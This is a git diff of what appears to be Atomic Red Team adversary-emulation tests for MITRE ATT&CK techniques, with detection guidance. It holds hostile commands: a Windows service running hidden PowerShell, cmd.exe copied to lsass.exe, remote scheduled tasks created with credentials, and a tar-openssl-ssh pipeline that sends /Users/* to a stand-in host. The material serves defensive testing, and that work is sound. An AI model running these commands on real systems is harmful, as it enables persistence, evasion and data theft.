@@ -1,4 +1,3 @@
---
attack_technique: T1033
display_name: System Owner/User Discovery
@@ -13,7 +12,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of remote computer
type: string
type: strong
default: computer1
executor:
atomics/T1035/T1035.md
-30
View File
@@ -1,30 +0,0 @@
# T1035 - Service Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
<blockquote>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
<br/>
## Atomic Test #1 - Execute a Command as a Service
Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:rt-marker.txt|
#### Run it with `command_prompt`!
```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
```
<br/>
atomics/T1035/T1035.yaml
-29
View File
@@ -1,29 +0,0 @@
---
attack_technique: T1035
display_name: Service Execution
atomic_tests:
- name: Execute a Command as a Service
description: |
Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of service to create
type: string
default: ARTService
executable_command:
description: Command to execute as a service
type: string
default: "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
executor:
name: command_prompt
command: |
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
atomics/T1036/T1036.md
-52
View File
@@ -1,52 +0,0 @@
# T1036 - Masquerading
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036)
<blockquote>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
### Windows
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
An example of abuse of trusted locations in Windows would be the <code>C:\Windows\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
### Linux
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
An example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Masquerading as Windows LSASS process](#atomic-test-1---masquerading-as-windows-lsass-process)
- [Atomic Test #2 - Masquerading as Linux crond process.](#atomic-test-2---masquerading-as-linux-crond-process)
<br/>
## Atomic Test #1 - Masquerading as Windows LSASS process
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
<br/>
<br/>
## Atomic Test #2 - Masquerading as Linux crond process.
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
**Supported Platforms:** Linux
#### Run it with `sh`!
```
cp /bin/sh /tmp/crond
/tmp/crond
```
<br/>
atomics/T1036/T1036.yaml
-30
View File
@@ -1,30 +0,0 @@
---
attack_technique: T1036
display_name: Masquerading
atomic_tests:
- name: Masquerading as Windows LSASS process
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
- name: Masquerading as Linux crond process.
description: |
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
supported_platforms:
- linux
executor:
name: sh
command: |
cp /bin/sh /tmp/crond
/tmp/crond
atomics/T1037/T1037.md
+11 -3
View File
@@ -1,14 +1,22 @@
# T1037 - Logon Scripts
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037)
<blockquote>### Windows
<blockquote>===Windows===
Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.
If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
### Mac
===Mac===
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</blockquote>
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.
Detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.
Platforms: macOS, Windows
Data Sources: File monitoring, Process monitoring
System Requirements: Write access to system or domain logon scripts</blockquote>
## Atomic Tests
atomics/T1040/T1040.md
+11 -3
View File
@@ -1,10 +1,18 @@
# T1040 - Network Sniffing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</blockquote>
Detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.
Platforms: Linux, macOS, Windows
Data Sources: Network device logs, Host network interface, Netflow/Enclave netflow
Permissions Required: Administrator, SYSTEM
System Requirements: Network interface access and packet capture driver</blockquote>
## Atomic Tests
atomics/T1042/T1042.md
+20 -6
View File
@@ -1,13 +1,27 @@
# T1042 - Change Default File Association
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1042)
<blockquote>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
<blockquote>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:
* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>
*<code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
*<code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
*<code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</blockquote>
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.
Detection: Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under <code> [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts</code> and override associations configured under <code>[HKEY_CLASSES_ROOT]</code>. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.
Platforms: Windows
Data Sources: Windows Registry, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator, SYSTEM
Contributors: Stefan Kanthak, Travis Smith, Tripwire</blockquote>
## Atomic Tests
@@ -30,6 +44,6 @@ Change Default File Association From cmd.exe
#### Run it with `command_prompt`!
```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
```
<br/>
atomics/T1042/T1042.yaml
+1 -1
View File
@@ -21,4 +21,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
atomics/T1046/T1046.md
+11 -1
View File
@@ -1,6 +1,16 @@
# T1046 - Network Service Scanning
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.</blockquote>
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.
Platforms: Linux, macOS, Windows
Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process use of network
Permissions Required: User, Administrator, SYSTEM</blockquote>
## Atomic Tests
atomics/T1047/T1047.md
+15 -1
View File
@@ -2,7 +2,21 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
<blockquote>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</blockquote>
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
Detection: Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)
Platforms: Windows
Data Sources: Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator
System Requirements: WMI service, winmgmt, running.
Host/network firewalls allowing SMB and WMI ports from source to destination.
SMB authentication.
Remote Support: Yes</blockquote>
## Atomic Tests
atomics/T1048/T1048.md
+9 -8
View File
@@ -1,6 +1,14 @@
# T1048 - Exfiltration Over Alternative Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</blockquote>
<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.
Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis
Requires Network: Yes</blockquote>
## Atomic Tests
@@ -43,13 +51,6 @@ Local to Remote
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
atomics/T1048/T1048.yaml
-14
View File
@@ -46,20 +46,6 @@ atomic_tests:
- ubuntu
- linux
input_arguments:
domain:
description: target SSH domain
type: url
default: target.example.com
user_name:
description: username for domain
type: string
default: atomic
password:
description: password for user
type: string
default: atomic
executor:
name: sh
command: |
atomics/T1049/T1049.md
+14 -4
View File
@@ -2,13 +2,23 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
<blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
### Windows
===Windows===
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).
Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net.
### Mac and Linux
===Mac and Linux ===
In Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".</blockquote>
In Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: User, Administrator</blockquote>
## Atomic Tests
atomics/T1050/T1050.md
+17 -21
View File
@@ -2,7 +2,21 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1050)
<blockquote>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.
Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).</blockquote>
Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.
Detection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
Platforms: Windows
Data Sources: Windows Registry, Process monitoring, Process command-line parameters
Effective Permissions: SYSTEM
Permissions Required: Administrator, SYSTEM</blockquote>
## Atomic Tests
@@ -19,18 +33,9 @@ Installs A Local Service
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `command_prompt`!
```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc create TestService binPath="C:\Path\file.exe"
```
<br/>
<br/>
@@ -41,17 +46,8 @@ Installs A Local Service via PowerShell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `powershell`!
```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Stop-Service -Name "#{service_name}"
(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
powershell New-Service -Name "TestService" -BinaryPathName "C:\Path\file.exe"
```
<br/>
atomics/T1050/T1050.yaml
+2 -27
View File
@@ -9,23 +9,10 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: Path
default: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
service_name:
description: Name of the Service
type: String
default: AtomicTestService
executor:
name: command_prompt
command: |
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc create TestService binPath="C:\Path\file.exe"
- name: Service Installation PowerShell
Installs A Local Service using PowerShell
description: |
@@ -33,19 +20,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: Path
default: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
service_name:
description: Name of the Service
type: String
default: AtomicTestService
executor:
name: powershell
command: |
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Stop-Service -Name "#{service_name}"
(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
powershell New-Service -Name "TestService" -BinaryPathName "C:\Path\file.exe"
atomics/T1050/bin/AtomicService.exe
BIN
View File
Binary file not shown.
atomics/T1050/src/AtomicService.cs
+1 -1
View File
@@ -6,7 +6,7 @@ using System.Diagnostics;
using System.ServiceProcess;
// c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe AtomicService.cs
// sc create AtomicService binPath= "C:\AtomicRedTeam\atomics\T10150\bin\AtomicService.exe"
// sc create AtomicService binPath= "C:\Test\AtomicService.exe"
// sc start AtomicService
// sc stop AtomicSerivce
// sc delete AtomicSerivce
atomics/T1053/T1053.md
+27 -3
View File
@@ -1,8 +1,32 @@
# T1053 - Scheduled Task
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
<blockquote>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)
<blockquote>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</blockquote>
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
Detection: Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the <code>svchost.exe</code> in Windows 10 and the Windows Task Scheduler <code>taskeng.exe</code> for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in <code>%systemroot%\System32\Tasks</code> for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)
*Event ID 106 - Scheduled task registered
*Event ID 140 - Scheduled task updated
*Event ID 141 - Scheduled task removed
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
Platforms: Windows
Data Sources: File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Effective Permissions: Administrator, SYSTEM, User
Permissions Required: Administrator, SYSTEM, User
Remote Support: Yes
Contributors: Travis Smith, Tripwire, Leo Loobeek, @leoloobeek, Alain Homewood, Insomnia Security</blockquote>
## Atomic Tests
@@ -64,6 +88,6 @@ Create a task on a remote system
#### Run it with `command_prompt`!
```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
<br/>
atomics/T1053/T1053.yaml
+1 -2
View File
@@ -35,7 +35,6 @@ atomic_tests:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
- name: Scheduled task Remote
description: |
Create a task on a remote system
@@ -66,4 +65,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
atomics/T1055/T1055.md
+34 -16
View File
@@ -2,26 +2,44 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
<blockquote>Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
### Windows
===Windows===
There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)
There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)
* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
### Mac and Linux
===Mac and Linux===
Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)
* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)
Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
